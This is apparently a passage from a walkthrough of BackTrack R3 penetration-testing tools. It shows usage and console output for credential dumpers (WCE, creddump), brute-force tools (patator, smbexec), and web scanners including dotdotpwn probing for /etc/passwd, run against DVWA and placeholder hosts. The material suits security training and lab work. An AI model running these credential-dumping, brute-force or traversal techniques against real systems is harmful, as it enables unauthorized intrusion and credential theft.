* Read Kerberos tickets from file and insert into Windows cache

C:\>wce -k
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Herna
n Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Reading kerberos tickets from file 'wce_krbtkts'...
5 kerberos tickets were added to the cache.
Done!

* Dump cleartext passwords stored by the Digest Authentication package

C:\>wce -w
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security -
by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

test\MYDOMAIN:mypass1234
NETWORK SERVICE\WORKGROUP:test

13. creddump

creddump is a python tool to extract various credentials and secrets from
Windows registry hives. It currently extracts:
* LM and NT hashes (SYSKEY protected)
* Cached domain passwords
* LSA secrets

root@bt:/pentest/passwords/creddump# ./cachedump.py
usage: ./cachedump.py

14. hash-identifier

root@bt:/pentest/passwords/hash-identifier# ./hash_id.py
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################

-------------------------------------------------------------------------
HASH:

15. smbexec

root@bt:/pentest/passwords/smbexec# ./smbexec.sh
cp: cannot stat `/pentest/passwords/smbexec/progs/patches/smb.conf': No such file or directory

************************************************************
smbexec - v1.0.9
A rapid psexec style attack with samba tools
Original Concept and Script by Brav0Hax & Purehate
Codename - Diamond in the Rough
Gonna pha-q up - PurpleTeam Smash!
************************************************************

1. Local Account
2. Domain Account
3. Create a host list
4. Enumerate Shares
5. Exit
Choice :
************************************************************

16. johnny - GUI for John the Ripper

root@bt:/pentest/passwords/johnny# ./johnny

17. patator

root@bt:/pentest/passwords/patator# ./patator.py
Usage:
$ ./patator.py module --help
or
$ ln -s patator.py module
$ ./module --help

Available modules:
+ ftp_login : Brute-force FTP authentication
+ ssh_login : Brute-force SSH authentication
+ telnet_login : Brute-force Telnet authentication
+ smtp_login : Brute-force SMTP authentication
+ smtp_vrfy : Enumerate valid users using SMTP VRFY
+ smtp_rcpt : Enumerate valid users using SMTP RCPT TO
+ http_fuzz : Fuzz HTTP/HTTPS
+ pop_passd : Brute-force poppassd authentication (http://netwinsite.com/poppassd/ not POP3)
+ smb_login : Brute-force SMB authentication
+ ldap_login : Brute-force LDAP authentication
+ mssql_login : Brute-force MSSQL authentication
+ oracle_login : Brute-force Oracle authentication
+ mysql_login : Brute-force MySQL authentication
+ pgsql_login : Brute-force PostgreSQL authentication
+ vnc_login : Brute-force VNC authentication
+ dns_reverse : Reverse lookup subnets
+ dns_forward : Forward lookup subdomains
+ snmp_login : Brute-force SNMP v1/2/3 authentication
+ unzip_pass : Brute-force the password of encrypted ZIP files
+ keystore_pass : Brute-force the password of Java keystore files

18. statsprocessor

root@bt:/pentest/passwords/statsprocessor# ./sp32.bin --help
sp by atom, High-Performance word generator based on hashcat markov stats

Usage: ./sp32.bin [options]... hcstat-file [filter-mask]

* Startup:

-V, --version Print version
-h, --help Print help

* Increment:

--pw-min=NUM Start incrementing at NUM
--pw-max=NUM Stop incrementing at NUM

* Markov:

--markov-disable Emulates maskprocessor output
--markov-classic No per-position tables
--threshold=NUM Filter out chars after NUM chars added
Set to 0 to disable

* Misc:

--combinations Calculate number of combinations
--hex-charset Assume charset is given in hex

* Resources:

-s, --skip=NUM skip number of words (for restore)
-l, --limit=NUM limit number of words (for distributed)

* Files:

-o, --output-file=FILE Output-file

* Custom charsets:

-1, --custom-charset1=CS User-defineable charsets
-2, --custom-charset2=CS Example:
-3, --custom-charset3=CS --custom-charset1=?dabcdef
-4, --custom-charset4=CS sets charset ?1 to 0123456789abcdef

* Built-in charsets:

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;?@[\]^_`{|}~
?a = ?l?u?d?s
?h = 8 bit characters from 0xc0 - 0xff
?D = 8 bit characters from german alphabet
?F = 8 bit characters from french alphabet
?R = 8 bit characters from russian alphabet


Backtrack R2
root@bt:/pentest/web# ls
asp-auditor fimap owasp-zap sslstrip wapiti xsser
beef grabber padbuster uniscan webscarab xssfuzz
blindelephant grendel-scan powerfuzzer untidy websecurify
burpsuite mantra proxystrike vega webslayer
darkmysqli mopest scanners w3af wfuzz
dirbuster nikto skipfish waffit wpscan

Backtrack R3

root@bt:/pentest/web# ls
asp-auditor blindelephant dirb dpscan grabber joomscan nikto plecost scanners sslyze vega wapiti webslayer xsser
backdoors burpsuite dirbuster fimap grendel-scan mantra owasp-zap powerfuzzer skipfish uniscan w3af webscarab wfuzz xssfuzz
beef darkmysqli dotdotpwn golismero htexploit mopest padbuster proxystrike sslstrip untidy waffit websecurify

8 new tools in web

1. dirb
2. dpscan
3. plecost
4. sslyze
5. backdoors
6. dotdotpwn
7. golismero
8. htexploit

1. dirb - is a Web Content Scanner. It looks for existing (and/or hidden) Web
Objects. It basically works by launching a dictionary based attack against
a web server and analizing the response.

root@bt:/pentest/web/dirb# ./dirb http://IP-Address/dvwa/ wordlists/small.txt -w

-----------------
DIRB v2.03
By The Dark Raver
-----------------

START_TIME: Thu Feb 16 11:18:43 2012
URL_BASE: http://IP-Address/dvwa/
WORDLIST_FILES: wordlists/small.txt
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 957

---- Scanning URL: http://IP-Address/dvwa/ ----
+ http://IP-Address/dvwa/con
(FOUND: 403 [Forbidden] - Size: 1125)
+ http://IP-Address/dvwa/config/
==> DIRECTORY
+ http://IP-Address/dvwa/docs/
==> DIRECTORY
+ http://IP-Address/dvwa/external/
==> DIRECTORY
+ http://IP-Address/dvwa/nul
(FOUND: 403 [Forbidden] - Size: 1125)

---- Entering directory: http://IP-Address/dvwa/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://IP-Address/dvwa/config/con
(FOUND: 403 [Forbidden] - Size: 1125)
+ http://IP-Address/dvwa/config/nul
(FOUND: 403 [Forbidden] - Size: 1125)

---- Entering directory: http://IP-Address/dvwa/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://IP-Address/dvwa/docs/con
(FOUND: 403 [Forbidden] - Size: 1125)
+ http://IP-Address/dvwa/docs/nul
(FOUND: 403 [Forbidden] - Size: 1125)

---- Entering directory: http://IP-Address/dvwa/external/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://IP-Address/dvwa/external/con
(FOUND: 403 [Forbidden] - Size: 1125)
+ http://IP-Address/dvwa/external/nul
(FOUND: 403 [Forbidden] - Size: 1125)

-----------------
DOWNLOADED: 3828 - FOUND: 8

2. dpscan - There are different CMS (content management system) are available like wordpress, Joomla, light CMS and Drupal. Security of each CMS is very important and as a penetration tester point we need to make a website secure by doing a penetration testing on it.

root@bt:~/Desktop# python DPScan.py www.site-to-test.co.uk
node
user_optin
fckeditor
system
gsa
mtv_videobrowse
nice_menus
user
cck
top_tabs
panels
jquery_update
root@bt:~/Desktop#

3. plecost

root@bt:/pentest/web/plecost# ./plecost-0.2.2-9-beta.py

////////////////////////////////////////////
// ..................................DMI...
// .............................:MMMM......
// .........................$MMMMM:........
// .........M.....,M,=NMMMMMMMMD...........
// ........MMN...MMMMMMMMMMMM,.............
// .......MMMMMMMMMMMMMMMMM~...............
// .......MMMMMMMMMMMMMMM..................
// ....?MMMMMMMMMMMMMMMN$I.................
// .?.MMMMMMMMMMMMMMMMMMMMMM...............
// .MMMMMMMMMMMMMMN........................
// 7MMMMMMMMMMMMMON$.......................
// ZMMMMMMMMMMMMMMMMMM.......plecost.......
// .:MMMMMMMZ~7MMMMMMMMMO..................
// ....~+:.................................
//
// Plecost - WordPress finger printer Tool (with threads support) 0.2.2-9-beta
//
// Developed by:
// Francisco Jesus Gomez aka (ffranz@iniqua.com)
// Daniel Garcia Garcia (dani@iniqua.com)
//
// Info: http://iniqua.com/labs/
// Bug report: plecost@iniqua.com

Usage: ./plecost-0.2.2-9-beta.py [options] [ URL | [-l num] -G]

Google search options:
-l num : Limit number of results for each plugin in google.
-G : Google search mode

Options:
-n : Number of plugins to use (Default all - more than 7000).
-c : Check plugins only with CVE associated.
-R file : Reload plugin list. Use -n option to control the size (This take several minutes)
-o file : Output file. (Default "output.txt")
-i file : Input plugin list. (Need to start the program)
-s time : Min sleep time between two probes. Time in seconds. (Default 10)
-M time : Max sleep time between two probes. Time in seconds. (Default 20)
-t num : Number of threads. (Default 1)
-h : Display help. (More info: http://iniqua.com/labs/)

Examples:

* Reload first 5 plugins list:
plecost -R plugins.txt -n 5
* Search vulnerable sites for first 5 plugins:
plecost -n 5 -G -i plugins.txt
* Search plugins with 20 threads, sleep time between 12 and 30 seconds for www.example.com:
plecost -i plugin_list.txt -s 12 -M 30 -t 20 -o results.txt www.example.com

4. sslyze

Better, faster scanner to analyze the configuration of SSL servers.

Supports cipher suites scanning, insecure renegotiation verification, session resumption testing, client certificates, and more...
Tested on Python 2.6 & 2.7 with Ubuntu and Windows 7, both 32 and 64 bits. Might work on other platforms as well.
Based on OpenSSL and a custom SSL Python wrapper.

root@bt:/pentest/web/sslyze# ./sslyze.py IP-Address

REGISTERING AVAILABLE PLUGINS
-----------------------------

PluginOpenSSLCipherSuites - OK
PluginCertInfo - OK
PluginSessionRenegotiation - OK
PluginSessionResumption - OK

CHECKING HOST(S) AVAILABILITY
-----------------------------

IP-Address:443 => IP-Address:443

SCAN COMPLETED IN 0.15 S
------------------------

5. backdoors

6. dotdotpwn

root@bt:/pentest/web/dotdotpwn# ./dotdotpwn.pl -m http -h IP-Address
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( )| | | ` \( )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################

[+] Report name: Reports/IP-Address_08-16-2012_11-46.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: IP-Address
[+] Protocol: http
[+] Port: 80

[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 14640

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[*] HTTP Status: 400 | Testing Path: http://IP-Address:80/../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://IP-Address:80/../etc/issue
[*] HTTP Status: 400 | Testing Path: http://IP-Address:80/../boot.ini
[*] HTTP Status: 400 | Testing Path: http://IP-Address:80/../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: http://IP-Address:80/../../etc/passwd
^C
[+] Total Traversals found: 0
[-] Fuzz testing aborted
[+] Report saved: Reports/IP-Address_08-16-2012_11-46.txt

7. golismero - help you to map an web application, displaying as confortable format for security auditor and preparing them for intergrate with other web hacking tools as w3af, wfuzz, netcat, nikto, etc

root@bt:/pentest/web/golismero# ./GoLismero.py -h
/pentest/web/golismero/libs/updater.py:5: DeprecationWarning: the md5 module is deprecated; use hashlib instead
import md5

GoLISMERO - The Web Knife.

Daniel Garcia Garcia - dani@iniqua.com | dani@estotengoqueprobarlo.es

usage: GoLismero.py [-h] [-R RECURSIVITY] [-t TARGET] [-o OUTPUT]
[-F {text,html,csv,xml,scripting,wfuzz}]
[-A {all,forms,links}] [-V] [-c] [-x] [-m] [-na] [-nc]
[-ns] [-ni] [-nm] [-nl] [-l] [-us HTTP_AUTH_USER]
[-ps HTTP_AUTH_PASS] [-C COOKIE] [-P PROXY] [-U]
[-f FINGER] [--follow]

optional arguments:
-h, --help show this help message and exit
-R RECURSIVITY recursivity level of spider. Default=0
-t TARGET target web site.
-o OUTPUT output file.
-F {text,html,csv,xml,scripting,wfuzz}
output format. "scripting" is perfect to combine with
awk,cut,grep.... default=text
-A {all,forms,links} Scan only forms, only links or both. Default=all
-V Show version.
-c colorize output. Default=No
-x, --search-vulns looking url potentially dangerous and bugs. As default
not selected
-m, --compat-mode show results as compact format. As default not
selected.
-na, --no-all implies no-css, no-script, no-images and no-mail. As
default not selected.
-nc, --no-css don't get css links. As default not selected.
-ns, --no-script don't get script links. As default not selected.
-ni, --no-images don't get images links. As default not selected.
-nm, --no-mail don't get mails (mailto: tags). As default not
selected.
-nl, --no-unparam-links
don't get links that have not parameters. As default
not selected.
-l, --long-summary detailed summary of process. As default not selected.
-us HTTP_AUTH_USER, --http-auth-user HTTP_AUTH_USER
set http authenticacion user. As default is empty.
-ps HTTP_AUTH_PASS, --http-auth-pass HTTP_AUTH_PASS
set http authenticacion pass. As default not empty.
-C COOKIE, --cookie COOKIE
set custom cookie. As default is empty.
-P PROXY, --proxy PROXY
set proxy, as format: IP:PORT. As default is empty.
-U, --update update Golismero.
-f FINGER, --finger FINGER
fingerprint web aplication. As default not selected.
(not implemented yet)
--follow follow redirect. As default not redirect.

Examples:
- GoLISMERO.py -t site.com -c
- GoLISMERO.py -t site.com -c -A links -x
- GoLISMERO.py -t site.com -m -c -A links -o results.html -F html -x
- GoLISMERO.py -t site.com -c -A links -o wfuzz_script.sh -F wfuzz
- GoLISMERO.py -t site.com -A links --no-css --no-script --no-images --no-mail -c -x
or GoLISMERO.py -t site.com -A links -nc -ns -ni -nm
or GoLISMERO.py -t site.com -A links --no-all
or GoLISMERO.py -t site.com -A links -na

For more examples you can see EXAMPLES.txt

root@bt:/pentest/web/golismero# ./GoLismero.py -t IP-Address
/pentest/web/golismero/libs/updater.py:5: DeprecationWarning: the md5 module is deprecated; use hashlib instead
import md5

GoLISMERO - The Web Knife.

Daniel Garcia Garcia - dani@iniqua.com | dani@estotengoqueprobarlo.es

[ http://IP-Address ]

Links
=====
[L1] /dvwa/

Forms
=====

Total links: 1
Total Forms: 0

root@bt:/pentest/web/golismero#

8. htexploit

root@bt:/pentest/web/htexploit# ./htexploit -u http://IP-Address/dvwa/vulnerabilities/sqli/

.:: .:: .::: .:::::: .:::::::: .:: .::
.:: .:: .:: .:: .:: .: .::
.:: .:: .:: .:: .:: .:: .: .:: .:: .:: .:.: .:
.:::::: .:: .:: .:::::: .: .:: .: .:: .:: .:: .:: .:: .::
.:: .:: .:: .:: .: .: .:: .:: .:: .:: .:: .::
.:: .:: .:: .:: .: .:: .:: .:: .:: .:: .:: .:: .::
.:: .:: .:: .:::::::: .:: .:: .:: .::: .:: .:: .::
.::
v0.7b

[-] http://IP-Address/dvwa/vulnerabilities/sqli/ is probably NOT exploitable :(
You should run the 'full' module anyway, just in case.

Would you like to run the 'full' scan module? [Y/n] y
I/O error on writing output file, do you have permissions?

[+] Full Scan Completed.
[+] 1 files were downloaded, out of 750 (0% success rate). Report was saved in '/pentest/web/htexploit/htexploit-07931'

root@bt:/pentest/web/htexploit# ./htexploit -h

| | __ __| ____| | _) |
| | | __| \ \ / __ \ | _ \ | __|
___ | | | ` < | | | ( | | |
_| _| _| _____| _/\_\ .__/ _| \___/ _| \__|
_| v0.7b

Usage: htexploit -u [URL] [options]

Options:
-h, --help show this help message and exit
-m MODULE, --module=MODULE
Select the module to run (Default: detect)
-u URL, --url=URL **REQUIRED** - Specify the URL to scan
-o OUTPUT, --output=OUTPUT
Specify the output directory
-w WORDLIST, --wordlist=WORDLIST
Specify the wordlist to use
-v, --verbose Be verbose
root@bt:/pentest/web/htexploit#